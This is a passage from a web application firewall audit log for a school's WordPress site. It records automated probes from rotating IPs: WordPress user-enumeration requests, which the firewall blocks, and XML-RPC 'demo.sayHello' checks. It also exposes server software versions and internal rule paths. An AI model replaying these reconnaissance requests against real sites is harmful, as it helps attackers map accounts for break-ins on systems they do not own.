(CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746300242526567 3301 (- - -) Stopwatch2: 1746300242526567 3301; combined=1402, p1=446, p2=924, p3=0, p4=0, p5=32, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c8429b5e-Z-- --ac295003-A-- [04/May/2025:02:24:08 +0700] aBZtWESOhfQ6W15Bgg8R3gAAAE4 103.236.140.4 50816 103.236.140.4 8181 --ac295003-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.199.165 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.199.165 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ac295003-C-- demo.sayHello --ac295003-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ac295003-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746300248439999 6469 (- - -) Stopwatch2: 1746300248439999 6469; combined=4733, p1=604, p2=3886, p3=39, p4=42, p5=97, sr=79, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ac295003-Z-- --508a7c56-A-- [04/May/2025:02:30:50 +0700] aBZu6kSOhfQ6W15Bgg8R5QAAAFY 103.236.140.4 50864 103.236.140.4 8181 --508a7c56-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.193.79 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.193.79 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --508a7c56-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --508a7c56-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746300650178845 3138 (- - -) Stopwatch2: 1746300650178845 3138; combined=1360, p1=461, p2=869, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --508a7c56-Z-- --52a1f534-A-- [04/May/2025:02:30:57 +0700] aBZu8USOhfQ6W15Bgg8R5wAAAEI 103.236.140.4 50868 103.236.140.4 8181 --52a1f534-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.193.79 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.193.79 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --52a1f534-C-- demo.sayHello --52a1f534-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --52a1f534-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746300657848281 5869 (- - -) Stopwatch2: 1746300657848281 5869; combined=4325, p1=537, p2=3564, p3=29, p4=32, p5=95, sr=111, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --52a1f534-Z-- --e2caff29-A-- [04/May/2025:02:31:45 +0700] aBZvIUSOhfQ6W15Bgg8R6AAAAEs 103.236.140.4 50872 103.236.140.4 8181 --e2caff29-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.185.206 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.185.206 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e2caff29-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e2caff29-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746300705723673 3235 (- - -) Stopwatch2: 1746300705723673 3235; combined=1455, p1=518, p2=907, p3=0, p4=0, p5=30, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e2caff29-Z-- --186bc715-A-- [04/May/2025:02:31:49 +0700] aBZvJUSOhfQ6W15Bgg8R6gAAAEw 103.236.140.4 50876 103.236.140.4 8181 --186bc715-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.185.206 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.185.206 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --186bc715-C-- demo.sayHello --186bc715-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --186bc715-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746300709638047 6434 (- - -) Stopwatch2: 1746300709638047 6434; combined=4668, p1=603, p2=3830, p3=36, p4=40, p5=95, sr=77, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --186bc715-Z-- --ed077f0b-A-- [04/May/2025:02:35:54 +0700] aBZwGkSOhfQ6W15Bgg8R8AAAAFQ 103.236.140.4 50896 103.236.140.4 8181 --ed077f0b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.36.47 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.36.47 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ed077f0b-C-- demo.sayHello --ed077f0b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ed077f0b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746300954947218 5374 (- - -) Stopwatch2: 1746300954947218 5374; combined=3997, p1=510, p2=3258, p3=29, p4=32, p5=103, sr=69, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ed077f0b-Z-- --88ee1e76-A-- [04/May/2025:03:28:05 +0700] aBZ8VYOgvPi2IO4kz1sCYAAAAIw 103.236.140.4 51244 103.236.140.4 8181 --88ee1e76-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.174.120 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.174.120 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --88ee1e76-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --88ee1e76-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746304085792433 2908 (- - -) Stopwatch2: 1746304085792433 2908; combined=1297, p1=448, p2=818, p3=0, p4=0, p5=31, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --88ee1e76-Z-- --b27ea825-A-- [04/May/2025:03:28:10 +0700] aBZ8WileQJs6d7wanHHVDgAAAMM 103.236.140.4 51248 103.236.140.4 8181 --b27ea825-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.174.120 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.174.120 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b27ea825-C-- demo.sayHello --b27ea825-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b27ea825-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746304090688804 6014 (- - -) Stopwatch2: 1746304090688804 6014; combined=4360, p1=600, p2=3531, p3=35, p4=37, p5=94, sr=83, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b27ea825-Z-- --0323734c-A-- [04/May/2025:03:28:25 +0700] aBZ8aSleQJs6d7wanHHVDwAAANY 103.236.140.4 51252 103.236.140.4 8181 --0323734c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.25 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0323734c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0323734c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746304105271999 3251 (- - -) Stopwatch2: 1746304105271999 3251; combined=1405, p1=477, p2=875, p3=0, p4=0, p5=52, sr=84, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0323734c-Z-- --e4478d7d-A-- [04/May/2025:03:28:31 +0700] aBZ8b0SOhfQ6W15Bgg8SEQAAAFE 103.236.140.4 51256 103.236.140.4 8181 --e4478d7d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.25 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e4478d7d-C-- demo.sayHello --e4478d7d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e4478d7d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746304111608500 4629 (- - -) Stopwatch2: 1746304111608500 4629; combined=3650, p1=430, p2=3025, p3=22, p4=24, p5=88, sr=66, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e4478d7d-Z-- --15ae5654-A-- [04/May/2025:03:30:10 +0700] aBZ80oOgvPi2IO4kz1sCYgAAAIU 103.236.140.4 51270 103.236.140.4 8181 --15ae5654-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.137.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.137.6 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --15ae5654-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --15ae5654-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746304210837298 3225 (- - -) Stopwatch2: 1746304210837298 3225; combined=1335, p1=456, p2=846, p3=0, p4=0, p5=33, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --15ae5654-Z-- --749fb904-A-- [04/May/2025:03:30:15 +0700] aBZ81yleQJs6d7wanHHVEgAAAMY 103.236.140.4 51274 103.236.140.4 8181 --749fb904-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.137.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.137.6 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --749fb904-C-- demo.sayHello --749fb904-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --749fb904-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746304215754513 6285 (- - -) Stopwatch2: 1746304215754513 6285; combined=4542, p1=570, p2=3760, p3=31, p4=33, p5=87, sr=82, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --749fb904-Z-- --c93a0d4c-A-- [04/May/2025:03:30:39 +0700] aBZ87yleQJs6d7wanHHVFAAAANM 103.236.140.4 51278 103.236.140.4 8181 --c93a0d4c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.39.10 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.39.10 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c93a0d4c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c93a0d4c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746304239240880 2136 (- - -) Stopwatch2: 1746304239240880 2136; combined=1036, p1=365, p2=643, p3=0, p4=0, p5=27, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c93a0d4c-Z-- --43b61459-A-- [04/May/2025:03:30:44 +0700] aBZ89ESOhfQ6W15Bgg8SFQAAAE0 103.236.140.4 51282 103.236.140.4 8181 --43b61459-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.39.10 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.39.10 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --43b61459-C-- demo.sayHello --43b61459-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --43b61459-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746304244691055 5114 (- - -) Stopwatch2: 1746304244691055 5114; combined=3895, p1=531, p2=3156, p3=23, p4=26, p5=93, sr=141, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --43b61459-Z-- --03e9de04-A-- [04/May/2025:03:39:54 +0700] aBZ_GoOgvPi2IO4kz1sCZQAAAIQ 103.236.140.4 51370 103.236.140.4 8181 --03e9de04-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.82.116 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.82.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --03e9de04-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --03e9de04-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746304794117182 2984 (- - -) Stopwatch2: 1746304794117182 2984; combined=1310, p1=452, p2=827, p3=0, p4=0, p5=30, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --03e9de04-Z-- --2db7d27c-A-- [04/May/2025:03:39:58 +0700] aBZ_HoOgvPi2IO4kz1sCZwAAAJM 103.236.140.4 51374 103.236.140.4 8181 --2db7d27c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.82.116 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.82.116 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2db7d27c-C-- demo.sayHello --2db7d27c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2db7d27c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746304798326282 4875 (- - -) Stopwatch2: 1746304798326282 4875; combined=3866, p1=427, p2=3226, p3=30, p4=31, p5=89, sr=69, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2db7d27c-Z-- --4c100977-A-- [04/May/2025:03:41:04 +0700] aBZ_YIOgvPi2IO4kz1sCaAAAAI8 103.236.140.4 51388 103.236.140.4 8181 --4c100977-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.198.174 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.198.174 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4c100977-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close 